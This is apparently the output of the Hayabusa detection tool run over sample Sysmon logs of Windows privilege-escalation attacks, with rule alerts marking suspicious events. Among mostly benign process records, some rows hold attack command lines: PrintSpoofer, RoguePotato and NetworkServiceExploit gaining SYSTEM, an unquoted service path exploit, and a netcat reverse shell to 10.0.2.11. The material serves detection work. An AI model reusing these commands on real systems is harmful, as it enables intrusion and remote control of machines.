C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as 
SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named 
Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process 
